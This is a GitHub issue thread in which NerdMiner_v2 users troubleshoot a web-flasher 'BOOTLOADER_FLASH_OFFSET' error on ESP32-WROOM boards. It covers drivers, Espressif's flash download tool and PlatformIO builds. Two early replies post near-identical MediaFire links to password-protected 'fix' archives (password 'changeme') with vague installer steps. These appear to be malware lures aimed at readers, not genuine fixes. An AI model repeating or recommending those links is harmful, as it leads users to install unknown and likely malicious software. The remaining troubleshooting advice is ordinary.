BitMaker-hub/NerdMiner_v2 #467: BOOTLOADER_FLASH_OFFSET Failed to flash on ESP32-WROOM

drttm, 2024-08-27:
I have two boards `ESP32-WROOM-32` that I bought following the [link](https://s.click.aliexpress.com/e/_DCzlUiX) from your list of supported boards.
I was not sure which one to chose between `ESP32-WROOM-32**D**` and `ESP32-WROOM-32**U**`, and I bought one of each. 
Initially, neither board was even detected when connecting the USB on my Windows 11 64bit. I messaged the seller and they kindly sent me the drivers `CP210x_VCP_Windows`, and I installed them (`CP210xVCPInstaller_x64.exe`). After restarting and connecting them via USB, the system now detects it and I attempted to [flash](https://flasher.bitronics.store/) the NMV2 1.6.3 on ESP32-WROOM. It is detected properly in my Chrome Incognito browser so I proceeded. And this is the error message I got:

```
Flashing failed: TypeError: Cannot read properties of undefined (reading 'BOOTLOADER_FLASH_OFFSET')
Starting flash process...
Error connecting to chip: Error: Failed to connect with the device
Fetching: assets/nerdminer2_1.6.3_esp32wroom/0x1000_bootloader.bin
Fetched: 0x1000_bootloader.bin
Fetching: assets/nerdminer2_1.6.3_esp32wroom/0x8000_partitions.bin
Fetched: 0x8000_partitions.bin
Fetching: assets/nerdminer2_1.6.3_esp32wroom/0xe000_boot_app0.bin
Fetched: 0xe000_boot_app0.bin
Fetching: assets/nerdminer2_1.6.3_esp32wroom/0x10000_firmware.bin
Fetched: 0x10000_firmware.bin
Flashing failed: TypeError: Cannot read properties of undefined (reading 'BOOTLOADER_FLASH_OFFSET')
```

It does not connect with the devices properly. It shows the same error in both boards `ESP32-WROOM-32D` and `ESP32-WROOM-32U` when I try them separately. Alternatively, if I try to install the x86 driver for 32bit, then it appears a warning message suggesting to install the 64bit according to my machine. 

Can you confirm these are actually the right supported boards or did I chose the wrong ones? In case they are right, I am not sure if I may need to ask for different driver or what should I do at this point.
Any suggestion and help are welcome. Thanks!

HarbingerOfFire, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

yldzmuhammed, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

HarbingerOfFire, 2024-08-27:
Check your signed in sessions for unknown people

murphy667, 2024-08-28:
ESP32-WROOM-32D (backside: nodemcu-esp32 devkitv1)  with cp2102 driver from microsoft (silicon labs). same Problem

murphy667, 2024-08-28:
I found a Solution.
1. Use esp32 flash download tool https://www.espressif.com/en/support/download/other-tools
2.  Import from nerdminer zip al the files from NerdMiner_v2-dev\bin\bin ESP32-devKit- no pass and use the settings from my screenshot.
3. Press start and then hold at the esp32 rst button and boot button, first release rst and the release boot.
4. It will flash now
[image]

haruzept, 2024-08-29:
Is there a similar tool for linux? Does it works with Adruino IDE?

julio-matarranz, 2024-08-29:
> Is there a similar tool for linux? Does it works with Adruino IDE?

Use https://code.visualstudio.com/Download and platformio's extension 😉

haruzept, 2024-08-29:
> > Is there a similar tool for linux? Does it works with Adruino IDE?
> 
> Use https://code.visualstudio.com/Download and platformio's extension 😉

OK. And than? What should I do?

julio-matarranz, 2024-08-29:
> > > Is there a similar tool for linux? Does it works with Adruino IDE?
> 
> > 
> 
> > Use https://code.visualstudio.com/Download and platformio's extension 😉
> 
> 
> 
> OK. And than? What should I do?

Git clone, open the project with vscode and build the project for the device you would like and upload. 😉

julio-matarranz, 2024-08-29:
You have this solution that imply to rebuild or web flasher with compatible browser or flashing with tools using files on the GitHub releases

Henbal-Invest, 2024-08-31:
Having the same issue with T-Display 1.14. Anyone already has a solution for this too?

ChicoCybergoth, 2025-01-10:
> > I found a Solution.
> > 
> > 1. Use esp32 flash download tool https://www.espressif.com/en/support/download/other-tools
> > 2. Import from nerdminer zip al the files from NerdMiner_v2-dev\bin\bin ESP32-devKit- no pass and use the settings from my screenshot.
> > 3. Press start and then hold at the esp32 rst button and boot button, first release rst and the release boot.
> > 4. It will flash now
> >    ![Screenshot 2024-08-28 133649](https://private-user-images.githubusercontent.com/49122142/362264646-9e5bd9ef-7750-42c3-9bb5-19cb12244175.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ4Njk3MTgsIm5iZiI6MTcyNDg2OTQxOCwicGF0aCI6Ii80OTEyMjE0Mi8zNjIyNjQ2NDYtOWU1YmQ5ZWYtNzc1MC00MmMzLTliYjUtMTljYjEyMjQ0MTc1LmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjglMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI4VDE4MjMzOFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTYyYWUzMTc2OGZkZDU2MzNjMzUzZTVkYzQ5NjQ2NjBiODg4ZmIzNDRjMDczNTY4MWFmNmU2ZjkxYWI5MWY1YTcmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.FsqHQT5C67SV5cR0E1ECZhdklY4U2q3-7UDauNrtk5g)
> 
> It worked! You just saved my tiny boards, thank you so much! :)
> 
> After several attempts it flashed on both boards (backside: `ESP32-devkitc_v4`). Initially, I thought all parameters were set automatically, but I realised I had to specify manually both the `@ addresses` and the `COM port` between your steps 2 and 3. Then, it worked following exactly as you described. Just additional info, before one may end up thinking that it does not work!

Friend, I had the exact same problem and your solution helped me, thank you very much!
But, have you discovered why this happens?
I already flashed around 30 NerdMiners with the ESP32 WROOM, but only this last batch gave this problem.

zmbiont, 2025-05-07:
[image]
It give me this error, i couldn't find why

jpduhen, 2025-05-07:
You can try my fork of the 350kH/s nerdminer code from [evgenykzz2] I put into a easy to use webflasher, it provides the option to flash serveral different ESP32 boards.

https://jpduhen.github.io/NerdMiner_v2-Cheap-Yellow-Display-2.4-and-2.8-single-and-double-USB/[](https://jpduhen.github.io/NerdMiner_v2-Cheap-Yellow-Display-2.4-and-2.8-single-and-double-USB/)